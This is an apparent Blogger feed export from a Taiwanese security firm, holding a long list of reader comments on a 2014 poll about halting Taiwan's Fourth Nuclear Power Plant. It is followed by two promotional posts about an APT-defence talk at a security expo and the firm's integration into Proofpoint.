<br><br>德國位於歐亞大陸,與鄰近國家電網相連,可以靠進口直接擁有電力,然而台灣四面環海, 一直以來都是靠進口煤炭、石油等進行火力發電,燃燒這些發電也是會製造大量的二氧化碳,二氧化碳是造成地球大氣溫室效應轉強,也就是地球暖化的主要原因,雖然他不會間接性的對人類製造傷害,但是積少成多,若碳排放量仍然追高不下,漸漸毀滅的是整個地球,溫度高升、氣候異常、空氣汙染、海平面上升、物種漸滅,聲稱愛護下一代的反核的人們、愛狗愛貓的人們,想過嗎?至於核能發電的熱能來自核分裂,不會製造出二氧化碳和空氣汙染,但是會生產出大量的放射性物質-鈾,若是沒有妥善安置處理這些物質,外洩的話,都會造成很大的傷害的核災,已有數國悲痛經歷,共勉之。
<br><br>蔣經國先生擔任行政院長時所推動的 "十大建設" 中, 其中一項就是 "興建核能發電廠" ( "核一廠" 就是該階段完工的 "核能發電廠" ). 而當時 "興建核能發電廠" 背後的真正目的卻是 "發展核子武器", 其後在軍方的 "中山科學院核能研究所" 的 "張憲義上校副所長" 叛逃美國告密, 被美國政府以各種強壓手段逼迫蔣氏政權停止其 "發展核子武器計畫". 難怪在蔣經國先生擔任臺灣總統期間, 最後一直沒核准 "核四廠" 的興建. 蔣經國先生逝世後, 於1999年才開始動工的 "核四廠", 在陳水扁先生2000年上臺擔任總統之後, 一度在2000年後期宣佈 "停建核四廠". 此時 "停建核四廠" 的損失還不至於太大, 而且有其必要性. 不料, 由於宣佈 "停建核四廠" 的時間點, 太冒犯了剛完成與陳水扁總統會面和解的中國國民黨主席連戰先生, 造成連戰先生似乎為反對而反對, 日後不斷地針對陳水扁政府的各種施政作為, 開始無厘頭似地徹底反對到底, 包括反對 "停建核四廠" 的措施, 不禁讓人懷念起較有理性的宋楚瑜先生. 連戰先生帶領整個 "中國國民黨", 鋪天蓋地似地發動各式各樣的政爭, 甚至籌畫罷免陳水扁先生總統之職. 不幸地, 如此真的逼迫陳水扁總統, 不到幾個月後就趕緊宣佈恢復 "興建核四廠". 唉! 連戰先生充份顯現出 "人性的醜陋面", 造成臺灣今日在 "核四廠" 問題上的?大困局, 嗚呼哀哉! 天佑臺灣! 祈求上蒼悲憫大家的林義雄先生! 馬英九先生, 是該大破大立的時候了!
<br><br>蔡英文年初見歐巴!學運啟動單遊覽車要四、五千萬,那來?
<br><br>請不要先誘導答案
<br><br>請不要以煽動的標題以及極簡二分法來左右民眾,謝謝。
<br><br>請不要發垃圾訊息擾民
<br><br>請不願漲電費又要求廢核的人閉嘴
<br><br>請反核人士明確告知如果核四停建,那之後如何面對核1,2,3廠除役的缺電危機,再生能源或綠能大家都會?,但是誰能保證這會比核能便宜?
<br><br>請反對的人提出在沒核電且又不漲電價的情況下,提出替代方案,不要為反對而反對!
<br><br>請反對者派員監督
<br><br>請支持政府及公家機關的貪汙者受極重罰
<br><br>請支援停建核四的人 開始停止夏天吹冷氣及使用高耗電量的產品 我就覺得他們有理
<br><br>請大家停下來想想,這事真的事不關已嗎?這核四真的安全,真的能為我們的家園帶來多大的福利與方便嗎,請你們發一點點時間去瞭解所謂的核四發電廠,它是怎樣的在糟蹋納稅人的錢,那些既得利益者是如何的利用他們的資源與權力來悍衛他們不公不義的利益,如果你還是認為及便如此我還能接受,那至少請大家為自己的下一代著想,核四萬一出問題,如此的政府有能力轉危為安嗎?救救別人,救救自己,也救救自己的下一代吧!
<br><br>請大家算一算全國共有多少電廠(火力:含媒,瓦斯,汽電共生!風力:西濱沿海有幾百支:水力有那些加上民營電廠?如加上現有三座核電,我們真的還需要核四嗎
<br><br>請正確詳細的告知,若核四徹底停建,我們的能源替代品是什麼?我們需支付多少費用?
<br><br>請以人本為核心、並拿出虔誠的敬意、把真正乾淨的宇宙國土、還給大自然吧!從一人立起、直達到立正安國。
<br><br>請再加上支持與停止之物價波動差異
<br><br>請把您認?有價值的消息告訴大嘴
<br><br>請找出可替之能源。
<br><br>請投票
<br><br>請告訴我,大家可以支付更高價的電費嗎?日本福島核電事件後?日本禁核了嗎?
<br><br>請那些暴民不要三不五十就跑出來逛街!台灣的形象被他們丟光了!
<br><br>請附加其他投票項目,比如接受漲電價同意電力優先提供產業使用,民間接受限電機制等等
<br><br>請林義雄聖人號召並帶領反核信徒自即曰起放棄使用任何電力包括電燈?電視?冷氣?洗衣機?電鍋等等生活曰常用電及搭乘捷運等交通工具並立即以身作則?力行。
<br><br>請政府把台灣改變成為太陽能的島國
<br><br>請停止核四,愛待我們下一代
<br><br>請停止發這種廣告信給我了。這種投票是沒意義的。
<br><br>請停止iMessage 騷擾謝謝˙
<br><br>請停建《
<br><br>請做民調如果電費漲價3成大家的接受度。
<br><br>請參考德國的綠能做法
<br><br>請問這是什麼單位做的調查,為什麼網路都查不到
<br><br>請問廢核這些人是否告訴全民黑暗的日子既將來臨
<br><br>請郭董事長
<br><br>請尋找替代能源
<br><br>請給下一代環保的環境!
<br><br>請徹底完全停建核四。
<br><br>請徹底停止核四建設
<br><br>請維護臺灣的下一代!廢除核4吧
<br><br>請蘋果大嘴去查一下臺電所有有關核電廠的委外計畫!保證會嚇死你!同時也會明白為什麼台電在核電廠會花錢如洪水的原因啦!
<br><br>請?達意見給廢核四的那些人,若是沒電可以用,他們可以過生活的話,我也沒意見只好移民了。
<br><br>誰支持就把核廢料放他家貯放。
<br><br>誰便宜當然就用誰
<br><br>誰敢保證廢核後不會影響供電?敢保證廢核後電價不漲、物價不會波動?非核家園是夢想,但是要考慮到所有百姓能夠負擔的起這麼大的成本嗎?
<br><br>誰準你發訊息給我的?
<br><br>誰
<br><br>確保核四非多系統拼裝機,不然徹底抵制核四
<br><br>緩步廢核,理性決策,不要激情,厭惡搧動。
<br><br>罷免陳歐珀
<br><br>學學先進國家"德國"吧!建立非核家園,不要把核廢料遺留給下一代!
<br><br>擁抱核能,人人有責!
<br><br>擔心核安,也要注意對岸福清核電廠吧,燃煤與天然氣的碳排放對氣候暖化問題比核安問題嚴重而且是立即性更迫切
<br><br>整天用手機也不想想電哪裡來的
<br><br>整頓好現有發電場
<br><br>靠別人不如靠自己
<br><br>興建核四,害子害孫。
<br><br>興建核5,廢除火電
<br><br>親??的朋友們!向前
<br><br>選擇太少 我認為應該建完 做為博物管 但不要運做
<br><br>選擇核四不一定會死,沒有核四則一定會死
<br><br>遺毒萬年
<br><br>錯誤的政策,比貪汙還可怕! 請理性知核,用真知安全地駕馭核電吧!讓民粹趕快走入歷史,真正民主才會到來! 不要換了恐核症,債留子孫!!
<br><br>錢花了就要用,廢核四大家把錢投入太平洋沒意義。
<br><br>錢是人民的。而核四爭議只看立場、只看政黨,這是不對的,你們把管理軟弱的執政黨,看成全民都軟弱嗎?為何我們沒有民主的素養?來幾場政策公聽會及政黨政策辯論會及擁核反核政策辯論會。讓全民來公決核四去留!
<br><br>錢都花了又不繼續?如果停建的話 一定會 有人吵 電費漲價 通通漲價!
<br><br>錢都花了可把核一核二廢除
<br><br>燃料裝填只不過是安檢最後一步驟
<br><br>燃煤發電讓二氧化碳的濃度加速擴大
<br><br>應先建再封存
<br><br>應可供台灣蓋兩座核四了吧
<br><br>應停止核四建設
<br><br>應將核四廠轉型成別種發電廠使用
<br><br>應該立即停止
<br><br>應該以較新的核四取代核一二及核三,前幾座應該優先除役,才更安全也不浪費核四建設費用。
<br><br>應該多一個選項
<br><br>應該把小百姓的盒包顧好才是重點?想想目前民生物質大漲!如電價在漲,相信物價一定會波動!請不要因為了一些人的利益而傷害了百姓!我挺核電。
<br><br>應該把替代能源克服後才能考量廢除核電!
<br><br>應該把舊的核電廠除役讓新的核電廠運轉
<br><br>應該建核四,廢核一二防止爆炸,進而建核五,廢核四
<br><br>應該是做好監督核能安全,不應有安全疑慮就浪費台灣納稅人的錢,反核四的人都繳稅了嗎?那汽機車每天都有車禍發生,啟不是要禁止生產及使用。
<br><br>應該停止健設任何核能發電廠
<br><br>應該停建。
<br><br>應該連統獨 地政法 証所稅 美牛 選罷 集遊 等等更多議題來做民調
<br><br>應該想想停止核四後,電要從那裡來而不是要停建後在來討論這樣就來不及了。
<br><br>應該說核能發電,是政客為了一己之利,釀成的人類浩劫!
<br><br>應該讓新的核電廠起來,讓舊的趕快退役,否則以台灣的龜速政治,能保障你我嗎?不懂在反對什麼,
<br><br>應顯示投票人數
<br><br>環保能源
<br><br>環境只有一個,也找不到第二個可生存的星球。 支持再生能源
<br><br>頻果又不公正,告訴你有用?
<br><br>頭都洗了,總是要沖水。
<br><br>頭都洗了那有不剪頭髮的道理
<br><br>講到廢核,德國1998年大選後,「紅綠共治」開始推動廢核此政策,並於2000年通過《再生能源優先法》即《再生能源法》,2002年正式通過廢核,3年間關閉了2間核電廠,為了填補廢核後的電力缺口,德國開始大量使用燃氣發電和再生能源,當時同期的天然氣價格上漲了4倍,電力業者又加收EEG Umlage之名,向人民收取再生能源附加費費用,使德國電價逐年上升,民眾叫苦連篇。2009年,發表新能源政策,將核能定義為「邁向新能源世代的過渡性必要選項」並在隔年10月通過,核電廠又繼續營運,1980年前營運的核電廠延壽8年,1980之後的延壽14年,又又又又又再2011年因日本福島事件再度廢核,若無修法,2022年在德國將不見核電廠蹤影,德國變成歐洲最大的電力進口國,衍生的問題一樣電價高漲,今年德國一度的電費差不多是台幣10~11元,每年還要多付400多歐分的再生能源附加費,相當於9500元台幣的電費,舉例四口家庭一年耗電量3000度,一年電費就要4萬多元,為比台灣高了4倍之差的電費,社會對於高昂電價也產生不少反彈,各位請先看看電費帳單,你家一年下來要花多少度的電,就算德國人的收入所得都是我們的3~4倍,那麼你們也可以比照他們鄰近國家的電費與他們的電費之差異,德國近年來收入所得也無大幅增加但是電費卻上漲了好幾成,甚至一些中低收入戶,因無法繳出高額電費,而被強制停電斷電,此等效應不可忽視。
<br><br>謝謝
<br><br>賺再多的錢也買不到另一個地球
<br><br>避免停工核四帶來的高電價,高物價的民生大計影響
<br><br>還有,終止核電,那也代表著電費要上漲,那台灣的人民是不是又要走上街頭抗議電費太貴?也不想想台電這幾年為民省了多少電費?台電每年都是處於虧損的狀態,甚至高達2000多億,台電的貢獻請問那些反對的民眾是否有好好想過?
<br><br>還我非核家園
<br><br>還是都閉嘴不吭聲
<br><br>還記得這兩年來漲電價後的影響嗎?物價飛漲、薪水沒漲一般老百姓抱怨連連,台灣國民所得不比歐洲地區高所得,現在絕對不是非核家園的時機!
<br><br>雖說有風險但可以減少電費是很好的!現在一直油電雙漲在不蓋電費之後不可想像!
<br><br>鞠躬下臺也無法挽回災難
<br><br>韓國的國家企業三星是怎麼樣低級的增加自己的競爭力是有目共睹的
<br><br>聰明的人民請告訴大家及自己
<br><br>總統加油!我覺得現在人民太我行我素了,說到底連Z咖都不是!
<br><br>總該請反對的人提出替代方案吧
<br><br>簡單講:
<br><br>舊的廢除?支持核四
<br><br>擺
<br><br>穩定社會'再發展替代發電方案。
<br><br>簽訂的合約的違約金是政府與人民負擔不起的風險
<br><br>贊成
<br><br>贊同的人-核廢料存他們家。(別太自私)經濟發展不是人生唯一追求目標
<br><br>關係到下一代環境、健康,應停止建核四,盡快找出替代能源才是當務之急!
<br><br>關鍵在核四的安全,只要確定安全設計及落實..., 沒有停建理由,除非反對建核四的人有更好且確定可執行的能源替代方案,不要只是會提反對但卻沒有更好的替代方案!
<br><br>難道不知道是違法的嗎?
<br><br>難道到時候電費飛漲在來怪政府嗎
<br><br>難道要國家所有建設,民生,投資全部停擺嗎?也需聽聽在野黨假若今天它執政的話-它們端出來的菜是什麼?燃炭會是另一嚴重污染源?這是我們要的嗎?所有的事情或決定是一體兩面!重要的是平橫
<br><br>題目設計偏激
<br><br>黨工吃屎吧 顆顆
<br><br>黨工回去領500啦 eo4
<br><br>爛網站
<br><br>爛攤子
<br><br>續建完成99%核四,選舉替代能源銜接,核一、二、三。如期除役!
<br><br>續建更先進?更有效率?更安全的核四,然後再考慮陸續廢除核一?二?三,這是連小學生都知道的”留新汰舊”不是嗎?
<br><br>續建核四!
<br><br>續建
<br><br>續建99%之核四,研議替代能源銜接,核一、二、三。如期除役!
<br><br>騙子
<br><br>嚴重影響他人安危的事,外人本就無權代決定。核電正是如此。
<br><br>繼續填充有何用,最要緊的趕快想那些在蘭嶼地上的人們阿!燃料再生也不想,治標不治本的工作有何用,嘖嘖!
<br><br>聽你幹古
<br><br>竊取電話號碼
<br><br>變更原始設計太危險
<br><br>顯而易見
<br><br>讓人才走出去,叫做人才外流。
<br><br>讓人才走進來,叫做木馬屠城。
<br><br>讓下一代決定!停止核4建設!
<br><br>讓台灣成為無核家園!
<br><br>讓台灣兌變回美麗祥和的蝴蝶寶島。
<br><br>讓地球喘口氣吧
<br><br>讓核四廠由具專業人士決定它的未來,而非意識型態的人左右。國家政策不能再停擺。台灣加油!
<br><br>讓資金流出去,叫做淘空台灣。
<br><br>讓資金流進來,叫做買下臺灣。
<br><br>讓選民來認同。
<br><br>響應環保與善用能源?
<br><br>顧守臺灣家園,為下ㄧ代子孫生活,必定廢除核電,用綠能源取代,我們優秀的人材可以辦到,乃是貪婪太嚴重,不公義的賄賂造成妥協、請大家支持!
<br><br>讚一廢核四
<br><br>讚
<br><br>伝3小簡訊
<br><br>囧,為什麼支持的比較多
<br><br>啥?
<br><br>啥小鬼
<br><br>癈核能
<br><br>若只認為核能對台不利 在還沒有替代能源之前 所以民生用電將會採取戒嚴 這將無可避免
<br><br>擁抱核能,人人有責!
<br><br>請支持拒絕泛政治性語言誤導兒童。
<br><br>( 例如電費,瓦斯,汽油等等 )
<br><br>-請支持完全廢核人士,提出有效替代方案,反對容易,要相對提出可行解決方案。
<br><br>-請支持完全廢核人士開始不用電梯上下樓,不用冷暖氣,電扇,節約能源。
<br><br>1、地點為斷層地帶。
<br><br>1:用電需要與否?
<br><br>1:以後連供電都有問題時(電費高漲)大家感受如何?
<br><br>1.任何發電方式對環境都有影響,我們應該選擇對環境衝擊最小的
<br><br>1. 核電成本較?,若包括安全成本、廢棄物處理成本在內。
<br><br>18%廢除 內部整頓一下
<br><br>2、太多黑金作業。
<br><br>2:建議由專家負責。
<br><br>2:若核四運轉,核一二三應停用~~
<br><br>2.林義雄是聖人,大家都關心他要不要吃東西,我們只是小人物,沒人關心我們有沒有東西吃
<br><br>2. 核電危險程度、危害範圍,足以毀家滅國。輻射半衰期遠大於百年,禍延子孫。
<br><br>2050 韓國核能將占50%。到時候、台灣經濟已經瓦解。
<br><br>22K不能接受,又怎麼可能面對接下來能源缺短、物價再漲的問題
<br><br>3、施工品質諸多瑕疵,經不起日後考驗。
<br><br>3:廢舊廠,取用新廠。
<br><br>3:積極開發其他能源~~
<br><br>3. 目前核四仍然採用核子分裂技術,跟先進國家已經在研發的核子融合技術有相當大落差,因為核子融合就不會?生致命的輻射?。
<br><br>4、建議改為「觀光地區,增加收入」。
<br><br>4:核廢料,審慎處理。
<br><br>4. 台灣的人口在減少,企業也沒有增進,目前發電量尚有多餘備載,核電多出6%的電能是
<br><br>5:為避免謠言(傳),私人發電廠,售價?有問題,當核四廠起用後,是否可以足期解約,不買私人發電。謝謝,以上僅供參考。
<br><br>500塊領了沒?
<br><br>500,get
<br><br>55.7%不懂核四危險的人0.0
<br><br>?下一代?地球
<br><br>?能是未來的趨勢,發展綠色能源要提早全面宣傳!
<br><br>Be realistic, don't be idealistic. Do revalue the pro and con rationally. At the end of the day, the money in your pocket speaks ... Most people will vote for the nuclear generator. As long as the government can strictly contol, isolate and minimize the risk and nuclear exposure, I vote for that.
<br><br>Both forms take an optional second parameter which is values to bind to fields in the query, as an array:
<br><br>By 平少
<br><br>FUCK,不要偷我們的資料
<br><br>fuck
<br><br>Fuck no 毒
<br><br>Fuck the government
<br><br>fuck you
<br><br>FUCK YOU
<br><br>FxxK! 不要傳垃圾簡訊!
<br><br>Fyi
<br><br>Garbage 民調 都不會變
<br><br>Gg
<br><br>ggg
<br><br>Ggggggggggg
<br><br>Gggggggrrrerffgjj
<br><br>GO FOR TW
<br><br>go to die
<br><br>Good
<br><br>GY垃圾
<br><br>I don't believe delay so long time, we still need it!
<br><br>Just do it.
<br><br>JyI=
<br><br>kjhkhkjhjk
<br><br>kk
<br><br>Kkk
<br><br>Kkkk
<br><br>KMT又在使用小招數惹
<br><br>Kmt你們欠很多!
<br><br>KMT政府不要再掩蓋事實了
<br><br>LOGO這麼藍,畫的這麼醜
<br><br>Ngdngfnfghnyfmfymyfmyf
<br><br>Nil
<br><br>No
<br><br>NO NUKES SAVE TAIWAN
<br><br>Not the best but available.
<br><br>Nuke
<br><br>Nuke is the best
<br><br>o0o
<br><br>oiopiopiop
<br><br>OK到時候再來看這些反核人士還有沒有繼續反核
<br><br>OK
<br><br>Oop
<br><br>O_O
<br><br>Pp
<br><br>ppp
<br><br>ppt說你這是詐騙喔 http://www.ptt.cc/bbs/Gossiping/M.1398777580.A.BE6.html
<br><br>Ps"去建在中國大陸啦~然後再跟他們簽服貿協定~”你們大陸要供應所有原能源給台灣人,這樣才會給人民安定~國泰平安‧‧‧‧‧‧‧‧‧!
<br><br>qeqe
<br><br>qeqtwetwtwetewtwtwetwe
<br><br>QQ
<br><br>qqq
<br><br>qqqqqq
<br><br>Rfd
<br><br>sdfds
<br><br>Shit
<br><br>So
<br><br>ss
<br><br>Stop
<br><br>Stop it
<br><br>support
<br><br>test
<br><br>Thanks
<br><br>UIOP{
<br><br>uu
<br><br>uyuy
<br><br>Very annoying, please stop sending messages, thank you.
<br><br>w
<br><br>wer
<br><br>What the bull shit vote?
<br><br>Who are you?
<br><br>X
<br><br>xxx
<br><br>xxxx
<br><br>yeah
<br><br>yuyuyu
<br><br>Yyyy
<br><br>ZZ
<br><br>Zzzz
<br><br>ZZZZZZZZZZZZZZZZZZZZZZZz
<br><br>^_^
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-57415506933049364742014-03-17T12:09:00.001+08:002014-03-17T12:09:34.565+08:002014 資安展演講 -- 福爾摩斯兄弟性格差異:主動式 APT 之追蹤與偵測技術分享<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPysBmV-vy6I6YhDW5XgYE7TBTzX9mfLgwfZQSSls4FSOdSgdv267a08KOsL-dxckkzRmyDTgDGHoXsLeCOftzmieOdrf27P_AaekXY-zy5yEDfeFOLL0jr5UTGq-bTkPc4Ib5LyQ_NcI/s1600/sherlock_secutech_APT_blog.jpg" /><br>
<br>
小說中的偵探福爾摩斯全名為「夏洛克‧福爾摩斯」,具天賦異稟的觀察與分析能力,讓他馳騁偵探界;可是其實他的哥哥「邁克羅夫特‧福爾摩斯」具有比他更厲害之觀察分析能力。然而夏洛克却成為了家喻戶曉的知名大偵探,而不是哥哥邁克羅夫特。 究竟是什麼樣的人格特質差異,讓兩位具有一樣特殊能力的兄弟,確有完全不同的發展?為何阿碼宣稱,我們在針對性攻擊(APT)防禦技術的創新,獨步全球?主動式的 APT 防禦,跟被動式有何不同?今年請給我們機會,讓我們展示我們的跳脫性思考,我們的創新,我們設計出來,真正有用的、市場從未看過的針對性攻擊(APT)防禦機制!能夠做出這種東西,只此一家,絕無分店!除了講解我們在產品與技術面的創新,我們將分享近期阿碼團隊如何反入侵並追蹤各個針對性攻擊(APT)組織:他們的所在、使用的手法、攻擊的對象、受害者的分布、以及偷走的資料等。由於時間關係,這部分我們在這場將無法交代細節,只將挑出九個比較特殊的團體,做觀念性的介紹,但我們希望有時間將細節投稿至今年的 <a href="http://hitcon.org/">台灣駭客年會 HITCON</a>,有興趣的朋友,敬請期待!<br>
<br>
併購之後阿碼如何?我將在演講中分享我們併入Proofpoint後的近況,以及我們跟矽谷團隊工作所看到、學到的經驗。<br>
<br>
同時,阿碼團隊也準備了另外一場演講,詳細說明我們 APT 防禦產品面的各種功能,以及布置了全場最大的資安攤位。演講前後,希望能夠在我們攤位上碰到您!阿碼演講,絕無冷場,各位熱愛創新的資安人,阿碼與您有約!<br>
<span class="fullpost"><br>
<bold>演講(一)「福爾摩斯兄弟性格差異:主動式 APT 之追蹤與偵測技術分享」</bold></br>
時間:本週四 (3/20)早上 11:00am</br>
地點:<a href="http://www.secutechinfosecurity.com/14/tw/seminar_register.aspx?ff=5">2014亞太資訊安全論壇</a> 南港展覽館 501 室</br>
講師:黃耀文 Wayne / 創辦人</br>
</br>
<bold>演講(二)「Proofpoint APT 防禦 ─ 兼容「技術與管理」需求」</bold></br>
時間:本週四 (3/20)下午 2:30pm</br>
地點:<a href="http://www.secutechinfosecurity.com/14/tw/seminar_register.aspx?ff=5">2014亞太資訊安全論壇</a> 南港展覽館 501 室</br>
講師:徐明達 / 總經理</br>
<br>
攤位:5F IS03<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8Olizjjh6v4AfEuGRy0wQgbIIzFLisf8YLhTSwt-kclTbkkQ6h0Bz1DummX_-rHMRs_1W4l2Tlk39aEfyY_TxPAtslht9dYuu40YESMok4FqsH6pIEiYS_9a7HNCJb9fVDKZtBdGfhw/s1600/secutech_armorize_2014_mapv2.png" /><br>
<br>
交通資訊<a href="http://www.secutechinfosecurity.com/14/tw/showaccess.aspx">請見此</a>。
</span>Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-1441759431140700676.post-35576837666050140742014-02-05T06:36:00.000+08:002014-02-10T04:34:50.159+08:00駿馬奔騰來報喜,阿碼謝歲賀新年!<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbhIjGL9ba5Ue7sWTcyy1Zd40oC6vLH8pHk54lsFSL_2RgbkJfJQG8DI1QgN3vW04jqpqjbI2FyIhHfAMyJ5lrdTDBn4ACkYa_fQLhFfT1gvOeQ3k8lASxjKl7ogej0G5nn6FYSJjYCbE/s1600/armorize_proofpoint_chinese_new_year_2014.jpg" /><br />
<br />
各位一直以來支持著阿碼的朋友:<br />
<br />
新年快樂,駿馬奔騰來報喜,萬事順心行大利!承蒙各位一直以來給我們的鼓勵與照顧,謹代表阿碼團隊在此與各位報告,併購之後,阿碼全70多名成員,包含業務、業務工程、專業服務以及工程團隊等,全員一員未離,並開了多個職缺,整個團隊正持續成長,專注於產品的設計與創新,今年的美國 RSA 大展、歐洲的諸多資安會議、台灣的資安展、以及台灣駭客年會上,我都將親自公開多項我們這段期間內秘密研發之產品與技術,敬請各位拭目以待:各位,如果您覺得 APT(針對性攻擊)的產品正逐漸成熟的話,那麼我們想說,今年請給我們機會,讓我們展示我們的跳脫性思考,我們的創新,我們設計出來,真正有用的、市場從未看過的 APT 防禦機制!能夠做出這種東西,只此一家,絕無分店!我們感謝 Proofpoint 給予我們的舞台,也再次感謝各位給予我們的支持!<br />
<br />
年前我們真的非常忙碌。我們先是參加了美國一月份的「誓師大會」,在會場台上,我們將阿碼產品的由來、精髓、設計理念、以及創新,盡量地傳授給我們超過兩百位來自全球各地的業務與業務工程團隊。我也花了好些時間介紹台灣,放了不少漂亮的照片,結束後台下一致公認:達到業績,明年的業務訓練就在台灣辦吧!<br />
<br>
令我印象最深刻的,是執行長 Gary 在台上講述我們 2013 年重要成績時,提到了一個重點:Proofpoint 併購了阿碼科技。Gary 問台下:你們覺得這一步如何?阿碼的技術如何?我後面一位女士,在此時大聲地喊:「是 Proofpoint 的未來!」我聽了心臟都快跳出來,一方面高興,一方面也立刻想到,我們不會讓大家失望的!<br />
<br />
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ayuJVcwXMFlwA3UiFuo65zeFnldFYRgdmPQGdgG3uppexLiZIZA7b2w-pxaJQRI6WAEPvV556IG_N3VuupaLX89AQhwAyGMZH0yJjBN8DQlPl0agQ7ClMlPfhcHDWa81IjaFMWPOcsc/s1600/proofpoint_sko_2014.jpg" />
<br />
待在美國兩星期,我回到台灣不到三天,又與六位同事,一起到了灣區。這一次是反過來,由 Proofpoint 的多位同事來訓練我們。訓練什麼呢?告訴我們他們的整個防垃圾郵件與釣魚信件的引擎,如何運作,智慧型分類演算法為何,而例外之特徵又如何撰寫。阿碼跟 Proofpoint 其實有部分的技術是重複的:我們從網站安全,做到網站掛馬檢測,進而做到惡意文件的偵測以及 APT(針對性攻擊)的防禦。Proofpoint 則是從電子郵件起家,一路研究電子郵件威脅,如釣魚、魚叉式攻擊、長線式攻擊、水坑式攻擊,以及針對性攻擊等。<br />
<span class="fullpost"><br />
在針對性攻擊方面,Proofpoint 的經驗不若阿碼,可是針對性攻擊的來源,超過九成是透過電子郵件。而在電子郵件的巨量資料分析技術上,阿碼的資料量卻不如 Proofpoint 豐富。身為全球第一的電子郵件安全廠商,Proofpoint 擁有全球最多的客戶,也長期經營了全球最大最廣的惡意電子郵件誘捕系統,每天蒐集著完整的威脅樣本。兩家獨立時,設計產品與技術的思維,與兩家合而為一時的思維,是完全不一樣的。年前,Proofpoint 希望我們新聘人員,負責起亞洲惡意郵件特徵的撰寫,以及威脅分析等工作。我們的回應是,我們希望的更多:聘人當然不是問題,可是我們希望我們核心成員能夠了解 Proofpoint 的核心技術,先承擔起特徵撰寫的工作,爾後,一方面能夠傳授與其他同事,建立起亞洲的研究據點,另一方面,也可以作為兩邊技術整合的起點。於是,於幾天的通知下,我帶著阿碼的成員,再次訪問了灣區的同事們。<br />
<br />
<!-- <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhARyxSPISdCkikgvnGbYIMrbgF0-6Kb1cU3oissbcSHd2dBZgeES8KVFNTKCM8vheBMd7kvzNBVkVcTMJEbZyH2Als5F5oVVV1LMIiIC6XT9GKCCTn9JJjq6RAOnJIH3k-b0hAqNlbafw/s1600/armorize_proofpoint_2014_2.jpg" /> -->
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9SiT1tCUbmooitmXNWIIiiqZP6mzc6RzWPYo_ZL3k7MonW2YqVl06aWN0K4QuChW0nnOBKl0XRMaw1lPSIikF3P7-j5p727BLdqLf3-3dDEFLW0cNi1w-IZSxaIV029au3HD7EIf_JdA/s1600/armorize_proofpoint_2014_2a.jpg" /><br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEYvTuZYYXSYV0x0_whY3DVWCHVb6WgjT8P1rDsjTnTVrkfwQ5wbSpiclb_IArp8sYCDf9msicsZJ_d1voDokidppHB4TvVPFF0czs5cqTuV8iacRAlIe_olegxL_oHnMdQFiSAQDo_ho/s1600/armorize_proofpoint_2014_3.jpg" /><br>
<br />
整個訓練過程,令我們興奮無比。Proofpoint 有著阿碼之前所沒有的豐富樣本,巨量資料,並肯花大成本,永遠儲存著這些資料。這正是阿碼這邊朝思暮想希望能夠獲得的。APT 防禦發展至今日,能夠「辨認某個惡意文件」是惡意的,早已無法滿足企業的需求。我們必須進而分析出威脅的來源:攻擊者是哪個團體,此次攻擊從何時開始,對象有哪些部門,哪些同事,攻擊者的目的為何,這陣子的手法演進為何,哪些同事總是喜歡打開來路不明的郵件...<br />
<br />
這些只有靠長期累積下來的資料以及雲端的運算能力才能夠完成。我們了解我們這種純雲端的服務,可能對於部分亞洲的客戶來說,仍然比較難接受。可是阿碼從 2006 年成立以來,就一直相信雲端模式才是資安技術與服務的未來,而當我們逐漸茁壯之後,我們更加堅持這個眼光,並逐步淘汰我們非雲端的產品與技術。今天 Proofpoint 與阿碼之所以能夠結合,也是基於兩家公司的眼光一致:我們相信,雲端服務將成為主流,雲端的方便性與運算能力,能夠提供完全不同的產品設計模式,是值得我們堅持的方向。我們希望我們的客戶能夠給我們機會,我們也很有耐心:今年等不到您,還有明年、後年,馬羊猴雞狗豬,總有一年,您會覺得,雲端的安全性考量是可以被克服的,而雲端所帶來的好處是值得您採用的!<br />
<br />
我們覺得今年馬年,標出了一個很特殊的年代:<br />
<ul>
<li>全球最大物流商、全球最大的書商與全球最大雲端廠商是同一家<b>雲端軟體公司</b>:亞馬遜,並正發展由直昇機機器人送貨,其中關鍵為機器人之控制軟體;</li>
<li>全球最大的電視節目供應商是雲端軟體公司 Netflix</li>
<li>全球成長最快的電信業者是 P2P 軟體商 Skype</li>
<li>全球成長最快的娛樂產業,是軟體遊戲產業</li>
<li>基於軟體加解密演算法 與 網路P2P 原理的虛擬貨幣:比特幣,已經逐步被許多大型線上購物網站所接受,我相信它將帶來一場金融革命,而今天的礦工要學的是演算法與晶片特性;</li>
<li>美國車業的新前途由軟體人開啟:Paypal 創辦人穆斯克所設計的全電車 Tesla,車子裡沒有油箱.水箱.變速箱.機油.火星塞.點火線.電盤.觸媒轉換器.排氣管,產線大部分由機器人完成;在許多美國太空計畫因經費問題被迫終止之際,他創立的 Space X 公司正一步步往成功移民火星之路邁進;</li>
<li>許多電影中,軟體 3D 虛擬的主角早已取代了真人;</li>
</ul>
在這一個軟體與雲端正跨產業地快速取代既有技術的年代,任何一波的軟體創新,都將因是否跟得上,而產生鮮明的贏家與輸家,就如當時蘋果一家的智慧型手機創新,瞬間重創了當時的許多龍頭:手機龍頭 Nokia、Motorola、跟黑莓,遊戲機龍頭任天堂與新力,唱片行與百事達,同時也瞬間造就了諸多社群網站、行動應用、與 App 創業風潮。<br />
<br />
在這樣一個年代,我們相信,唯有以雲端運算為基礎的服務,才能走得長遠,才能有效運用諸多新興的技術,提供新世代的防禦功能,希望客戶能夠給我們機會,體驗完全不一樣的 APT 防禦服務,我們要保護到您收到的每一封電子郵件,您遭遇到的每一波針對性攻擊,謝謝各位!
